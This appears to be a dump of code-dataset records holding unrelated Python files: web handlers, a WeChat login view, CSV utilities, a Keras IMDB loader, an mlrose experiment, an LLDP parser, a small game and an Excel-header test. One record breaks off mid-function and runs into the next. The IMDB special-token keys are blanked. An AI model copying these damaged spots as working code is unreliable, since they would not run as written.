UpdateSingleFeedHandler),\n (r'/aggregator/get-full-article', GetFullArticleHandler),\n (r'/aggregator/upload-article-image', UploadArticleImageHandler),\n (r'/aggregator/flush-memcache', FlushMemcacheHandler),\n (r'/aggregator/purge-old-articles', PurgeOldArticlesHandler)\n], debug=DEBUG)\n","sub_path":"server/apps/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"350727572","text":"import argparse\nimport json\n\nfrom easydict import EasyDict\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-cfg', '--config', type=str, required=True,\n help='Config file name?')\n parser.add_argument('-wkrs', '--num_workers', default=-1, type=int,\n \t\t\t\t\thelp='Number of workers for dataloaders?')\n parser.add_argument('-bsize', '--batch_size', default=-1, type=int,\n \t\t\t\t\thelp='Batch size for dataloaders?')\n return parser.parse_args()\n\ndef get_config():\n args = get_args()\n with open('configs/'+args.config) as f:\n config = EasyDict(json.load(f))\n\n if args.num_workers != -1: \n config.num_workers = args.num_workers\n if args.batch_size != -1: \n config.batch_size = args.batch_size\n\n return config\n\ndef get_device():\n parser = argparse.ArgumentParser()\n parser.add_argument('-g', '--gpu', type=int, required=True,\n help='GPU number?')\n return 'cuda:{}'.format(parser.parse_args().gpu)","sub_path":"utils/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"500711656","text":"from jinja2 import FileSystemLoader, Environment\nimport time\nimport os\n\n\ndef log(*args, **kwargs):\n # time.time() returns the unix time\n # convert the unix time into a human-readable format (hour:minute:second)\n formation = '%H:%M:%S'\n value = time.localtime(int(time.time()))\n dt = time.strftime(formation, value)\n # open in append mode and write to the log file\n with open('log.gua.txt', 'a', encoding='utf-8') as f:\n print(dt, *args, file=f, **kwargs)\n\n\n# __file__ is the name of this file\n# build the directory the templates are loaded from\ntemplate_path = '{}/template/'.format(os.path.dirname(__file__))\n# create a loader; jinja loads templates from this directory\nloader = FileSystemLoader(template_path)\n# use the loader to create an environment, which is what reads the template files\nenv = Environment(loader=loader)\n\n\ndef template(t_path, **kwargs):\n \"\"\"\n Take a template path and a set of keyword arguments,\n read the template and return the rendered result.\n \"\"\"\n 
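# fetch the named template from the environment and render it with the given keyword arguments\n 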
t = env.get_template(t_path)\n return t.render(**kwargs)\n\n\ndef response_with_headers(headers, status_code=200):\n header = 'HTTP/1.1 {} OK\\r\\n'.format(status_code)\n header += ''.join('{}: {}\\r\\n'.format(k, v)\n for k, v in headers.items())\n return header\n\n\ndef redirect(location):\n headers = {\n 'Content-type': 'text/html',\n }\n # use update instead of direct assignment to avoid a pycharm warning\n headers.update({\n 'Location': location\n })\n # 301 is a permanent redirect, 302 an ordinary (temporary) redirect\n # the meaning of the 302 status code and the role of the Location header\n header = response_with_headers(headers, 302)\n r = header + '\\r\\n' + ''\n return r.encode(encoding='utf-8')\n\n\ndef error(request, code=404):\n \"\"\"\n Return a different error response depending on code.\n Currently only 404 is implemented.\n \"\"\"\n e = {\n 404: b'HTTP/1.1 404 NOT FOUND\\r\\n\\r\\n<html><body><h1>404 NOT FOUND</h1></body></html>'\n }\n return e.get(code, b'')\n\n\ndef http_response(body, headers=None):\n \"\"\"\n headers is an optional dict of extra HTTP headers\n \"\"\"\n header = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n'\n if headers is not None:\n header += ''.join(['{}: {}\\r\\n'.format(k, v)\n for k, v in headers.items()])\n r = header + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"618597124","text":"import math\n\ndef readContentFromFile(filename):\n\ttry:\n\t\tif type(filename)==file:\n\t\t\tfileContent=\"\".join(filename.readlines())\n\t\t\treturn fileContent\n\t\telif type(filename)==str:\n\t\t\tfH=open(filename, \"rb\")\n\t\t\tfileContent=\"\".join(fH.readlines())\n\t\t\tfH.close()\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn None\n\t\t# End if\n\texcept:\n\t\treturn None\n\t# End try/except\n# End def\n\ndef convertSourceToColors(sourceContent, partsCount=3, oneLine=False):\n\ttry:\n\t\trtn=[]\n\n\t\tfor mainPartCounter in range(0, math.trunc(math.ceil(len(sourceContent)/(partsCount+0.0)))):\n\t\t\tsourceParts=sourceContent[mainPartCounter*partsCount:mainPartCounter*partsCount+partsCount]\n\n\t\t\tif type(sourceParts)==unicode:\n\t\t\t\tsourceParts=sourceParts.encode('utf8')\n\t\t\t# End if\n\n\t\t\tlenSourceParts=len(sourceParts)\n\n\t\t\tif lenSourceParts str:\n token = cache.get(\"wechat_access_token\")\n if token:\n return token\n url = const.WECHAT_TOKEN[\"get\"].format(\n settings.CORPID, settings.CORPSECRET\n )\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logger.error(format_exc())\n token = data[\"access_token\"]\n expires_in = data[\"expires_in\"]\n cache.set(\"wechat_access_token\", token, expires_in)\n return token\n\n\ndef get_user_identify(\n access_token: str,\n code: str,\n) -> str:\n url = const.WECHAT_USER_IDENTIFY.format(access_token, code)\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logging.error(format_exc())\n if not data[\"errcode\"] == 0:\n return \"\"\n else:\n return data[\"UserId\"]\n\n\ndef get_user_profile(access_token, user_id):\n url = const.WECHAT_USER_PROFILE.format(access_token, user_id)\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logging.error(format_exc())\n if not data[\"errcode\"] == 0:\n return \"\"\n else:\n return data\n\n\n@swagger_tags(\n names=[\n \"get\",\n ],\n tags=[\"wechat\"],\n)\n@action(detail=True)\n@api_view([\"GET\"])\n@permission_classes([AllowAny])\ndef wxlogin(\n request,\n *args,\n **kwargs,\n):\n access_token = get_access_token()\n code = request.GET.get(\"code\")\n if not code:\n return HttpResponseRedirect(\n const.CALL_BACK_URL.format(\n settings.CORPID, urllib.parse.quote(settings.DOMAIN)\n )\n )\n user_id = get_user_identify(access_token, code)\n user_profile = get_user_profile(access_token, user_id)\n if not user_profile:\n return Response(\n status=status.HTTP_401_UNAUTHORIZED, data=\"认证过期,请重新认证!\"\n )\n defaults = {\n field.column: user_profile.get(field.column)\n for field in Employee._meta.fields\n }\n employee, _ = Employee.objects.get_or_create(\n userid=user_id, defaults=defaults\n )\n user, _ = User.objects.get_or_create(\n username=user_id.lower(),\n defaults={\n \"email\": user_profile.get(\"email\"),\n \"employee\": employee,\n },\n )\n if user:\n login(request, user)\n
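 # django's messages framework queues this flash message for the next rendered page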
messages.SUCCESS, f\"欢迎你 ,{employee.name or user_id}!\"\n )\n else:\n messages.add_message(request, messages.ERROR, \"快速登录失败 ,请使用其他方式!\")\n return HttpResponseRedirect(\"/\")\n","sub_path":"wxapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"323284475","text":"import os\nimport pandas as pd \nimport numpy as np\nfrom keras.preprocessing import text\n\nclass uCsv(object):\n \"\"\"Utility functions for loading training dataset from a CSV file, and to extract\n the X variables and the ground truth y using column labels\"\"\"\n\n def fileExists(filename):\n os.path.exists(filename)\n\n def write(csvFile, npData, separator=\",\"):\n pdData = pd.DataFrame(data=npData)\n pdData.to_csv(csvFile, sep=separator, index=False, header=False)#, index_label=False)\n\n def writePd(csvFile, pdData, separator=\",\"):\n pdData.to_csv(csvFile, sep=separator, index=False, header=True)\n\n def openRead(csvfile, separator=\",\"):\n data = pd.read_csv(csvfile, sep=separator)\n return data\n\n def getXFromColumns(train_ori, columnsToKeep):\n \"\"\"To extract independant variables X\n Input types: pandas dataframe, and list of column labels to keep by removing other columns. Output type: 1 numpy array\"\"\"\n data = uCsv.keepColumns(train_ori, columnsToKeep)\n X = np.array(data.loc[:,:])\n return X\n\n def getXExceptColumns(train_ori, columnsToKeep):\n \"\"\"To extract independant variables X\n Input types: pandas dataframe, and list of column labels to exclude. Output type: 1 numpy array\"\"\"\n data = uCsv.dropColumns(train_ori, columnsToKeep)\n X = np.array(data.loc[:,:])\n return X\n \n def getFlatYFromColumn(train_ori, columnsToKeep):\n \"\"\"To extract dependant variable Y that contains the perfect prediction\n Input types: pandas dataframe, and list of column labels. Output type: 1 numpy array\"\"\"\n if len(columnsToKeep) <= 0:\n return None\n columnToKeep = columnsToKeep[0]\n data = uCsv.keepColumns(train_ori, columnsToKeep)\n y = np.ravel(data.loc[:,:])\n return y\n\n def dropColumns(train_ori, columnsToDrop):\n data = train_ori.drop(columnsToDrop, axis=1)#, \"Fare\"], axis=1)\n return data\n\n def keepColumns(train_ori, columnsToKeep):\n all_columns = train_ori.columns.values.tolist()\n columnsToDrop = uCsv.removeFromListAElementsFoundinListB(all_columns, columnsToKeep)\n data = train_ori.drop(columnsToDrop, axis=1)#, \"Fare\"], axis=1)\n return data\n\n\n def removeFromListAElementsFoundinListB(A, B):\n \"\"\"To ensure list A won't share any elements in common with list B.\n Input types: 2 lists. Output type: 1 list. 
This function has been optimized for speed.\"\"\"\n # timed tests using:\n #a = range(1,500000)\n #b = range(1,100000)\n \n #1) comprehension method\n #comprehension = [x for x in a if x not in b] # 12.8 sec\n\n #2) filter_function method\n #filter_function = filter(lambda x: x not in b, a) # 12.6 sec\n\n #3) modification method\n copyA = A.copy()\n for x in B: # 0.27 sec\n try:\n copyA.remove(x)\n except ValueError:\n pass\n return copyA\n \n def listFilesWithExtensionsInDirectoryAndSubDirectories(exts, topDir):\n \"\"\"ext: The extension to search for;\n topDir: The top directory\"\"\"\n listCsv = []\n for dirpath, dirnames, files in os.walk(topDir):\n for name in files:\n lowerName = name.lower()\n for ext in exts:\n lowerExt = ext.lower()\n if lowerName.endswith(lowerExt):\n listCsv.append(os.path.join(dirpath, lowerName))\n return listCsv\n\n def listFilesWithExtensionInDirectoryAndSubDirectories(ext, topDir):\n \"\"\"ext: The extension to search for;\n topDir: The top directory\"\"\"\n listCsv = []\n lowerExt = ext.lower()\n for dirpath, dirnames, files in os.walk(topDir):\n for name in files:\n lowerName = name.lower()\n if lowerName.endswith(lowerExt):\n listCsv.append(os.path.join(dirpath, lowerName))\n return listCsv\n\n def listFilesWithExtButWithoutOtherExtsInDirectoryAndSubDirectories(extToInclude, extsToExclude, topDir):\n \"\"\"extToInclude: The extension to search for, ex: file1.csv;\n extsToExclude: Similar extensions we don't want, ex: file1.predicted.csv;\n topDir: The top directory\"\"\"\n list1 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToInclude, topDir)\n list2 = uCsv.listFilesWithExtensionsInDirectoryAndSubDirectories(extsToExclude, topDir)\n list3 = uCsv.removeFromListAElementsFoundinListB(list1, list2)\n return list3\n\n def listFilesWithExtButWithoutAnotherExtInDirectoryAndSubDirectories(extToInclude, extToExclude, topDir):\n \"\"\"extToInclude: The extension to search for, ex: file1.csv;\n extToExclude: A similar extension we don't want, ex: file1.predicted.csv;\n topDir: The top directory\"\"\"\n list1 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToInclude, topDir)\n list2 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToExclude, topDir)\n list3 = uCsv.removeFromListAElementsFoundinListB(list1, list2)\n return list3\n \n def stackPandasRows(pdAccumulateArray, pdNewRows):\n \"\"\"Generic function that can be called repeatedly to vertically stack more and more rows to a table.\n The pre-initialize the pdAccumulateArray to an empty array = [].\"\"\"\n if pdAccumulateArray is None:\n pdAccumulateArray = []\n length = len(pdAccumulateArray)\n if length <= 0:\n pdAccumulateArray = pdNewRows\n else:\n pdAccumulateArray = pd.concat([pdAccumulateArray, pdNewRows], axis=0)\n return pdAccumulateArray\n\n def stackNumpyRows(npAccumulateArray, npNewRows):\n \"\"\"Generic function that can be called repeatedly to vertically stack more and more rows to a table.\n The pre-initialize the npAccumulateArray to an empty array = [].\"\"\"\n if npAccumulateArray is None:\n npAccumulateArray = []\n length = len(npAccumulateArray)\n if length <= 0:\n npAccumulateArray = npNewRows\n else:\n npAccumulateArray = np.concatenate((npAccumulateArray, npNewRows), axis=0)\n return npAccumulateArray\n\n def haveSameNbOfRows(pdArray1, pdArray2):\n \"\"\"Check if 2 pandas dataframes have the same number of rows\"\"\"\n if pdArray1 is None or pdArray2 is None:\n return False\n return pdArray1.shape[0] == pdArray2.shape[0]\n\n def 
def haveSameNbOfRows(pdArray1, pdArray2):\n \"\"\"Check if 2 pandas dataframes have the same number of rows\"\"\"\n if pdArray1 is None or pdArray2 is None:\n return False\n return pdArray1.shape[0] == pdArray2.shape[0]\n\n def isValidArray(array):\n if array is None:\n return False\n elif len(array) <= 0:\n return False\n return True\n\n","sub_path":"Andy/uCsv.py","file_name":"uCsv.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"170445866","text":"#!/usr/bin/env python -W ignore::DeprecationWarning\n\n# Project 2: Randomized Optimization -- GT CS7641 Machine Learning, Fall 2019\n# Eric W. Wallace, ewallace8-at-gatech-dot-edu, GTID 903105196\n\nimport mlrose\nimport os\nimport pandas as pd\nimport time\n\nEXPERIMENT_NAME = \"TSP_RHC\"\nOUTPUT_DIRECTORY = 'experiments'\nSEED = 1\n\n# Traveling Salesman Problem: spiral within a 6x6 grid, best (lowest) fitness score is ~34.6\ncoords_list = [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0), (6, 0),\n (6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6),\n (5, 6), (4, 6), (3, 6), (2, 6), (1, 6), (0, 6),\n (0, 5), (0, 4), (0, 3), (0, 2),\n (1, 2), (2, 2), (3, 2), (4, 2),\n (4, 3), (4, 4), (3, 4), (2, 4), (2, 3)]\nfitness = mlrose.TravellingSales(coords=coords_list)\nproblem = mlrose.TSPOpt(length=len(coords_list), fitness_fn=fitness, maximize=False)\nperfect_score = 34.60555127546399\n\n# prep dataset\nlabels = ['problem', 'max_attempts', 'max_iters', 'restarts',\n 'run_time', 'best_fitness', 'stopped_at', 'func_calls']\nresults_list = []\n\n# leave these variables static for RHC\niterations = 20000\n\n# run RHC over varying options\nhalt_loop = False\n# run 1:\n# for attempts in (25, 50, 75, 100, 125, 150):\n# \tfor restarts in (0, 25, 50, 75, 100, 125, 150):\n# run 2:\n# for attempts in (150, 300):\n# \tfor restarts in (125,):\n# run 3:\n# for attempts in (500,):\n# \tfor restarts in (125,):\n# run 4:\nfor attempts in (750,):\n\tfor restarts in (125,):\n\t\tstart_time = time.perf_counter()\n\t\t(_, best_fitness, curve) = mlrose.random_hill_climb(problem,\n\t\t max_attempts=attempts,\n\t\t max_iters=iterations,\n\t\t restarts=restarts,\n\t\t curve=True,\n\t\t random_state=SEED)\n\t\trun_time = time.perf_counter() - start_time\n\t\tstopped_at = curve.size\n\t\tfunc_calls = problem.get_function_calls()\n\t\tproblem.reset_function_calls() # don't forget to reset before the next run\n\t\tresults_list.append((EXPERIMENT_NAME, attempts, iterations, restarts,\n\t\t run_time, best_fitness, stopped_at, func_calls))\n\t\tif best_fitness == perfect_score:\n\t\t\thalt_loop = True\n\t\t\tbreak\n\tif halt_loop:\n\t\tbreak\n\n# compile & save results\ndf_results = pd.DataFrame.from_records(results_list, columns=labels)\ndf_results.to_excel(os.path.join(OUTPUT_DIRECTORY, EXPERIMENT_NAME + '.xlsx'))\ndf_results.to_pickle(os.path.join(OUTPUT_DIRECTORY, EXPERIMENT_NAME + '.pickle'))\n\n# minimal output\nprint(\"# Best Run:\")\nprint(df_results.loc[df_results['best_fitness'].idxmin()])\n","sub_path":"rhc_tsp.py","file_name":"rhc_tsp.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"442549144","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Zyxel.ZyNOS.get_lldp_neighbors\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2013 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n#NOC modules\nfrom noc.sa.script import Script as NOCScript\nfrom noc.sa.interfaces import IGetLLDPNeighbors\nfrom noc.lib.validators import is_int, is_ipv4\n
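#is_int/is_ipv4 classify the remote port id below to pick the LLDP port id subtype\n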
#Python standard modules\nimport re\n\n\nclass Script(NOCScript):\n name = \"Zyxel.ZyNOS.get_lldp_neighbors\"\n implements = [IGetLLDPNeighbors]\n\n rx_summary_split = re.compile(r\"^LocalPort.+?\\n\",\n re.MULTILINE | re.IGNORECASE)\n rx_s_line = re.compile(r\"(?P<local_if>\d+)\s+[0-9a-f:]+\s+.+?$\")\n\n rx_remote_port = re.compile(\"^\s+Port id:\s*(?P<remote_if>.+?)\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_remote_port_desc = re.compile(\"^Port Description:\s*(?P<port_descr>.+?)\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_remote_port_subtype = re.compile(\"^Port id subtype:\s*(?P<remote_if_subtype>.+?)\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_chassis_id = re.compile(r\"^\s+Chassis id:\s*(?P<id>\S+)\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_enabled_caps = re.compile(\"^System Capabilities Enabled:\s*(?P<caps>((other|repeater|bridge|router|wlan-access-point|telephone|docsis-cable-device|station-only)\s+)+)\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_system = re.compile(r\"^\s+System Name:\s*(?P<name>\S+)\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_mac = re.compile(r\"^[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}$\")\n\n def execute(self):\n r=[]\n try:\n v = self.cli(\"sh lldp info remote\")\n except self.CLISyntaxError:\n raise self.NotSupportedError()\n\n v = self.rx_summary_split.split(v)[1]\n lldp_interfaces = []\n\n #Get lldp interfaces\n for l in v.splitlines():\n l = l.strip()\n if not l:\n break\n match = self.rx_s_line.match(l)\n if not match:\n continue\n lldp_interfaces += [match.group('local_if')]\n\n #Get lldp neighbors\n for local_if in lldp_interfaces:\n i = {\n \"local_interface\": local_if,\n \"neighbors\": []\n }\n\n #Get neighbor details\n try:\n v = self.cli(\"sh lldp info remote interface port-channel %s\" % local_if)\n except self.CLISyntaxError:\n raise self.NotSupportedError()\n\n #Get remote port\n match = self.re_search(self.rx_remote_port, v)\n remote_port = match.group(\"remote_if\")\n\n match = self.re_search(self.rx_remote_port_subtype, v)\n remote_port_subtype_str = match.group('remote_if_subtype')\n\n #Get remote port subtype from \"Port ID Subtype\" field\n if remote_port_subtype_str == 'local-assigned':\n remote_port_subtype = 7 #Local\n else:\n remote_port_subtype = 5\n if self.rx_mac.match(remote_port):\n # Actually macAddress(3)\n remote_port_subtype = 3\n elif is_ipv4(remote_port):\n # Actually networkAddress(4)\n remote_port_subtype = 4\n elif is_int(remote_port):\n # Actually local(7)\n remote_port_subtype = 7\n n = {\n \"remote_port\": remote_port,\n \"remote_port_subtype\": remote_port_subtype,\n \"remote_chassis_id_subtype\": 4\n }\n\n #Get Chassis ID\n match = self.rx_chassis_id.search(v)\n if not match:\n continue\n n[\"remote_chassis_id\"] = match.group(\"id\")\n\n #Get capabilities\n cap = 0\n match = self.rx_enabled_caps.search(v)\n if match:\n for c in match.group(\"caps\").split():\n c = c.strip()\n if c:\n cap |= {\n \"other\": 1, \"repeater\": 2, \"bridge\": 4,\n \"wlan-access-point\": 8, \"router\": 16, \"telephone\": 32,\n \"docsis-cable-device\": 64, \"station-only\": 128\n }[c]\n n[\"remote_capabilities\"] = cap\n\n #Get system name\n match = self.rx_system.search(v)\n if match:\n n[\"remote_system_name\"] = match.group(\"name\")\n i[\"neighbors\"] += [n]\n r += [i]\n return r\n
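# worked example of the capability mask assembled above: a neighbor that\n# enables \"bridge\" and \"router\" reports remote_capabilities = 4 | 16 = 20\n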
+{"seq_id":"25672341","text":"import os\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint(tf.__version__)\nimdb = keras.datasets.imdb\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n# num_words = 10000 keeps 10,000 most frequently occurring words; the rest are discarded.\nprint(\"Training entries: {}, Labels: {}\".format(len(train_data), len(train_labels)))\nword_index = imdb.get_word_index()\nword_index = {k:(v+3) for k,v in word_index.items()} \nword_index[\"\"] = 0\nword_index[\"\"] = 1\nword_index[\"\"] = 2 # unknown\nword_index[\"\"] = 3\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\ndef decode_review(text):\n return ' '.join([reverse_word_index.get(i, \"?\") for i in text])\n\ntrain_data = keras.preprocessing.sequence.pad_sequences(train_data,\nvalue = word_index[\"\"],\npadding=\"post\",\nmaxlen=256)\ntest_data = keras.preprocessing.sequence.pad_sequences(test_data,\nvalue = word_index[\"\"],\npadding=\"post\",\nmaxlen=256)\nprint(len(train_labels))","sub_path":"Tensorflow/textClassification.py","file_name":"textClassification.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"141504202","text":"\n# DEFINE GLOBAL VARIABLES IN THIS FILE\n\n'''\n#### IMPORTANT NOTE! -> The current configuration is the same as config128.txt (the 128 x 128 case in the report). \n#### So careful!! Do not train the network again with this configuration or the current weights file (the current model) will be overwritten\n#### If this happens, you can redownload the corresponding weights file again from GitHub\n'''\n\nREPRODUCE_ORIGINAL_RESULTS = 1 # Set this value to 1 in case that you would like to split the dataset exactly as it originally was to test the results in the report\nINPUT_IMAGE_SIZE = 128 # Define input image size (64, 128, 256)\nTEST_SET_IMAGES = 46 # Total number of test set images in data/droneRace/test/original\n\n# Variables for training and testing (making predictions):\nBATCH_SIZE = 2 # Batch size\nEPOCH = 25 # Number of epoch\nVALIDATION_SPLIT = 0.15 # Validation split percentage\nGEN_IMAGE_NUM = 16 # See below\nAUX_TOTAL = GEN_IMAGE_NUM**2 + GEN_IMAGE_NUM # Number of images to be prepared for training\n # Make sure that AUX_TOTAL > (training set + validation set)\nWEIGHTS_HISTORY_SAVE_NAME = 'drone_bs' + str(BATCH_SIZE) + '_ep' + str(EPOCH) + '_im' + str(AUX_TOTAL) + '_size' + str(INPUT_IMAGE_SIZE) # Name for saving wrights and history\nGEN_DATA = 1 # Generate data for training. 1: YES, 0: NO. 
WEIGHTS_HISTORY_SAVE_NAME = 'drone_bs' + str(BATCH_SIZE) + '_ep' + str(EPOCH) + '_im' + str(AUX_TOTAL) + '_size' + str(INPUT_IMAGE_SIZE) # Name for saving weights and history\nGEN_DATA = 1 # Generate data for training. 1: YES, 0: NO. Better set to 1.\n\n# Variables exclusively for testing:\nSET_THRESHOLD = 0 # 0: Grayscale predictions, 1: Binary predictions\nTHRESHOLD = 0.2 # Define threshold in case that SET_THRESHOLD == 1 for different results \n\n# Postprocessing size for the ROC curves or better visualization\nPOSTPROCESSING_SIZE = 315 # Size of the post_processed image\nPOSTPROCESS_MASK = 1 # 1: Masks are postprocessed, 0: Masks are not post processed (Always set to one the first time you plot a ROC curve)\nPOSTPROCESS_PREDICTIONS = 1 # 1: Predictions are postprocessed, 0: Predictions are not post processed (Always set to one the first time you plot a ROC curve)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"77978418","text":"with open('C:\\\\Users\\\\jbwang\\\\Desktop\\\\otus_tax_assignments.txt') as f1:\r\n with open('C:\\\\Users\\\\jbwang\\\\Desktop\\\\tax.txt', 'w') as f2:\r\n # f2.write(f1.readline())\r\n for line in f1:\r\n id = line.split('\\t')[0]\r\n tax = line.strip().split('\\t')[1].split(';')\r\n if len(tax) == 7:\r\n f2.write(id + '\\t' + '\\t'.join(tax) + '\\n')\r\n else:\r\n while len(tax) < 7:\r\n tax.append('NA')\r\n newline = id + '\\t' + '\\t'.join(tax)\r\n f2.write(newline + '\\n')\r\n if len(tax) > 7:\r\n print(line)","sub_path":"codefile/tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"39299812","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\nimport pickle\n\n\nclass Model(object):\n def __init__(self):\n self.model = None\n self.X = None\n self.y = None\n \n def load_data(self):\n data = load_iris()\n self.X = data.data\n self.y = data.target\n\n def fit_model(self):\n self.model = RandomForestClassifier()\n self.model.fit(self.X, self.y)\n\n def pickle_model(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump(self.model, f)\n\nif __name__ == '__main__':\n m = Model()\n m.load_data()\n m.fit_model()\n m.pickle_model('model.pkl')\n","sub_path":"solutions/flask/brython_solution/fit_model.py","file_name":"fit_model.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"306037119","text":"# The main object classes\nimport math\nimport random\n\nclass Game:\n def __init__(self):\n self.round = 0\n self.starting_funds = 10\n self.game_on = False\n\n def round_num_patients(self, Patients):\n # Patients is a PatientPool object \n assert isinstance(Patients, PatientPool)\n return Patients.sick_per_round()\n\n def round_buy_GP(self, money_in):\n print(\"Current funds are \", money_in)\n round_spending = self.get_input_int()\n while round_spending > money_in:\n print(\"Insufficient funds. Your current balance is \", money_in)\n round_spending = self.get_input_int()\n print()\n return money_in - round_spending\n\n def get_input_int(self):\n try:\n input_int = int(input(\"How much would you like to spend? \"))\n 
\"))\n except:\n raise AssertionError(\"Please input an integer value\")\n return input_int\n \n def run_game(self):\n Patients = PatientPool()\n GPs = GPPool()\n funds = self.starting_funds\n round_n = 0\n num_sick = 0\n\n self.game_on = True\n\n while self.game_on:\n print(\"Round \", round_n)\n num_sick = self.round_num_patients(Patients)\n num_treated = GPs.treated_per_round(num_sick)\n print(\"This month, the number of sick seeking care is \", num_sick)\n print(\"You have \", GPs.num_GPs, \" GP offices available. They managed to treat \", num_treated, \" patients.\")\n\n funds = self.round_buy_GP(funds)\n if funds <= 0:\n self.game_on = False\n round_n +=1\n\n print(\"Your funds are \", funds, \". Game over.\")\n \n\nclass PatientPool:\n def __init__(self, total_population=100000, sickness_ratio=0.01):\n self.total_population = total_population\n self.sickness_ratio = sickness_ratio\n\n def sick_per_round(self):\n return math.floor(self.total_population * self.sickness_ratio * random.random())\n \nclass GPPool:\n def __init__(self, starting_GPs=5, patients_per_round=50, starting_cost=1):\n self.num_GPs = starting_GPs\n self.patients_per_round = patients_per_round\n self.cost_per_GP = starting_cost\n\n def treated_per_round(self, num_sick):\n if num_sick <= (self.num_GPs * self.patients_per_round):\n return 0\n elif num_sick > (self.num_GPs * self.patients_per_round):\n return num_sick - (self.num_GPs * self.patients_per_round)\n else:\n return None\n\n\n","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"425300381","text":"from mangrove.form_model.field import TextField\nfrom mangrove.form_model.form_model import FormModel\nfrom datawinners.entity.entity_export_helper import get_subject_headers, get_submission_headers\nfrom mangrove.bootstrap import initializer\nfrom mangrove.utils.test_utils.mangrove_test_case import MangroveTestCase\n\n\nclass TestExcelHeaders(MangroveTestCase):\n def setUp(self):\n MangroveTestCase.setUp(self)\n initializer.run(self.manager)\n\n\n def _get_header_component(self, headers, parameter):\n header_text = []\n for header in headers:\n self.assertTrue(isinstance(header, tuple))\n self.assertEqual(len(header), 3)\n header_text.append(header[parameter][0])\n return header_text\n\n def test_should_get_header_information_for_subject_excel(self):\n fields = [{\"name\": \"first name\", \"code\": 'q1', \"label\": 'What is your name', \"entity_question_flag\": False,\n \"type\": \"text\"},\n {\"name\": \"age\", \"code\": 'q2', \"label\": 'What is your age', \"type\": \"integer\", \"constraints\": [\n [\n \"range\",\n {\n \"max\": \"15\",\n \"min\": \"12\"\n }\n ]\n ]},\n {\"name\": \"reporting date\", \"code\": 'q3', \"label\": 'What is the reporting date',\n \"date_format\": \"dd.mm.yyyy\", \"type\": \"date\"},\n {\"name\": \"eid\", \"code\": 'eid', \"label\": 'What is the subject id', \"entity_question_flag\": True,\n \"type\": \"text\"},\n {\"name\": \"location\", \"code\": 'q4', \"label\": 'What is the location', \"type\": \"list\"},\n {\"name\": \"choices\", \"code\": 'q5', \"label\": 'Your choices', \"type\": \"select\"}]\n\n headers = get_subject_headers(fields)\n\n headers_text = self._get_header_component(headers, 0)\n self.assertEqual(\n [\"What is your name\", \"What is your age\", \"What is the reporting date\",\n \"What is the subject id\", 'What is the location',\n \"Your choices\"], headers_text)\n\n 
